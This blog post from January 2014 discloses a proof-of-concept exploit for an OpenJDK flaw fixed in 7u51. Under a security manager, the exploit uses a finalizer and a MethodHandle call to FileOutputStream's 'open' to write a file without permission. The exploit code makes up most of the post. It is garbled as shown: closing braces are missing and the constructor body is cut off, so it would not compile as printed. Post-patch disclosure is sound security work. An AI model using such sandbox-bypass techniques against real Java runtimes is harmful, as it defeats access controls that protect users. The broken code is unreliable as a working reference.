# Thursday, January 16, 2014
« Java Method Overriding Is FUBAR Part 8 o... | Main | New Development Snapshot »
Publicly Reported OpenJDK Vulnerability Fixed in 7u51

I tweeted a while ago about an OpenJDK vulnerability that was reported on one of the mailing lists.

Now that it has been fixed in 7u51, here is a simple PoC exploit:

import java.lang.invoke.*;

class test extends java.io.FileOutputStream {
  static test t;

  test() throws Exception {

  protected void finalize() {
    t = this;

  public static void main(String[] args) throws Throwable {
    MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",
                        MethodType.methodType(void.class, String.class, boolean.class));
    try { new test(); } catch (Exception _) { }
    mh.invokeExact(t, "oops.txt", false);

Run this with a security manager enabled on a version earlier than 7u51 and it'll create the file oops.txt, even though the code doesn't have the rights to do so.

Thursday, January 16, 2014 8:50:59 AM (W. Europe Standard Time, UTC+01:00)  #    Comments [1]